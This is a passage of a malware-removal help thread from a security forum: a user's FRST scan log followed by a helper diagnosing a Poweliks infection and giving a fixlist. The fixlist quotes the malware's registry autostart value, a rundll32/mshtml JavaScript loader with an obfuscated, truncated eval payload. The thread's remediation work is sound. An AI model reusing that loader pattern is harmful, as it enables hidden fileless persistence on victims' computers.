2014-09-13 18:38 - 2014-08-18 18:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-13 18:38 - 2014-08-18 18:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-13 18:38 - 2014-08-18 17:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-13 18:38 - 2014-08-18 17:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-13 18:38 - 2014-08-18 17:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-13 18:38 - 2014-08-18 16:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-13 18:38 - 2014-08-18 16:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-13 18:34 - 2014-06-26 21:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-10 21:02 - 2014-08-01 07:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-10 21:02 - 2014-06-23 22:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-09-02 14:26 - 2014-08-22 21:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-09-02 14:26 - 2014-08-22 20:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:51 - 2014-09-25 10:03 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:51 - 2014-09-22 18:54 - 00000000 ____D () C:\FRST
2014-09-25 10:50 - 2010-11-20 17:01 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:46 - 2014-09-22 15:21 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-25 10:46 - 2014-09-20 00:36 - 00002007 _____ () C:\Windows\setupact.log
2014-09-25 10:46 - 2013-08-25 22:02 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-25 10:46 - 2012-10-09 23:28 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 10:46 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-25 10:15 - 2012-10-09 22:42 - 01515758 _____ () C:\Windows\WindowsUpdate.log
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 10:03 - 2014-09-22 18:54 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-25 09:53 - 2014-09-25 09:50 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-25 00:17 - 2014-09-20 08:36 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-24 23:40 - 2014-09-24 23:41 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:50 - 2014-09-22 15:30 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-24 22:50 - 2014-09-22 15:30 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 08:49 - 2014-09-20 15:47 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-24 08:49 - 2012-10-09 23:14 - 00109280 _____ () C:\Users\Matts\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-24 08:49 - 2011-04-11 22:24 - 00000000 ____D () C:\Windows\CSC
2014-09-24 08:49 - 2009-07-14 00:33 - 00408000 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-24 01:19 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-09-24 00:10 - 2014-09-24 00:06 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 23:09 - 2009-07-13 22:04 - 00000855 _____ () C:\Windows\system32\Drivers\etc\hosts_bak_621
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2013-11-26 15:08 - 00000000 ____D () C:\ProgramData\Oracle
2014-09-23 22:44 - 2012-10-10 15:58 - 00000000 ____D () C:\Program Files\Java
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:33 - 2014-09-22 22:32 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:30 - 2014-09-20 15:30 - 00000000 ____D () C:\AdwCleaner
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:29 - 2014-09-22 21:28 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:14 - 2014-09-22 21:05 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:52 - 2014-09-14 18:19 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 20:07 - 2014-09-14 20:35 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-22 20:07 - 2014-09-14 20:34 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-22 19:55 - 2014-09-22 19:54 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:55 - 2014-09-14 18:19 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
2014-09-22 15:22 - 2012-10-09 22:51 - 00000000 ____D () C:\Users\Matts
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-22 02:41 - 2012-10-09 22:57 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-21 19:08 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 19:08 - 2014-09-21 17:00 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 19:03 - 2012-10-10 18:18 - 00000000 ____D () C:\Users\Matts\AppData\Local\Deployment
2014-09-21 19:02 - 2014-09-21 17:00 - 00000000 ____D () C:\temp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:50 - 2014-09-21 18:48 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:48 - 2013-10-28 10:27 - 00000000 ____D () C:\Program Files\InstallShield Installation Information
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:40 - 2014-09-21 17:15 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-21 16:44 - 2012-10-09 22:51 - 00000000 __SHD () C:\Recovery
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-20 00:36 - 2009-07-14 00:53 - 00032580 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-19 23:54 - 2014-09-19 23:26 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-19 21:42 - 2012-10-10 02:35 - 00000000 ____D () C:\Windows\Panther
2014-09-19 20:06 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-09-19 19:18 - 2012-10-10 13:33 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-19 19:18 - 2012-10-10 13:33 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-09-14 19:30 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:51 - 2013-01-08 12:23 - 00000000 ____D () C:\Program Files\CCleaner
2014-09-14 18:35 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\addins
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2012-10-10 15:18 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-14 18:07 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-11 23:08 - 2013-07-18 09:36 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-11 23:08 - 2012-10-17 21:06 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-11 23:08 - 2012-10-09 23:14 - 00002117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2014-09-11 23:08 - 2012-10-09 23:14 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-09-11 23:08 - 2012-10-09 23:14 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-09-09 17:47 - 2014-09-24 09:36 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-09-19 19:59

==================== End Of Log ============================

 

Thank you,

 

Brian


Edited by bcv15, 25 September 2014 - 09:11 PM.


#4 Elise

Elise

    Bleepin' Blonde


  • Malware Study Hall Admin
  • 61,207 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Romania
  • Local time:04:04 AM

Posted 26 September 2014 - 02:56 AM

Hi Brian,

Good news, the infection shows just fine in FRST. :)

 

Please press Windows key + R, type notepad and press enter.

Copy/paste the following text into Notepad.

HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Save the file as fixlist.txt in the same location as FRST.

Now rerun FRST and click the Fix button. Post the resulting log, restart your computer and let me know if you still have the problems with dllhost.exe


regards, Elise


"Now faith is the substance of things hoped for, the evidence of things not seen."

 

Follow BleepingComputer on: Facebook | Twitter | Google+ | lockerdome

 

Malware analyst @ Emsisoft


#5 bcv15

bcv15
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:09:04 PM

Posted 26 September 2014 - 03:56 PM

So far so GOOD!!

 

Thank you so much Elise!!

I'll check in the next couple of days for any update!

 

My daughter has been busting my chops to get her computer back, heheheh.

 

Thank you and your whole team for all the help you do for people!!

 

Brian



#6 Elise

Elise

    Bleepin' Blonde


  • Malware Study Hall Admin
  • 61,207 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Romania
  • Local time:04:04 AM

Posted 27 September 2014 - 02:09 AM

Hi Brian, I'm glad to hear that!

Can you please rerun DDS one more, check the option "attach.txt" and click scan. Post the resulting attach.txt (no need for dds.txt)


regards, Elise


"Now faith is the substance of things hoped for, the evidence of things not seen."

 

Follow BleepingComputer on: Facebook | Twitter | Google+ | lockerdome

 

Malware analyst @ Emsisoft





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users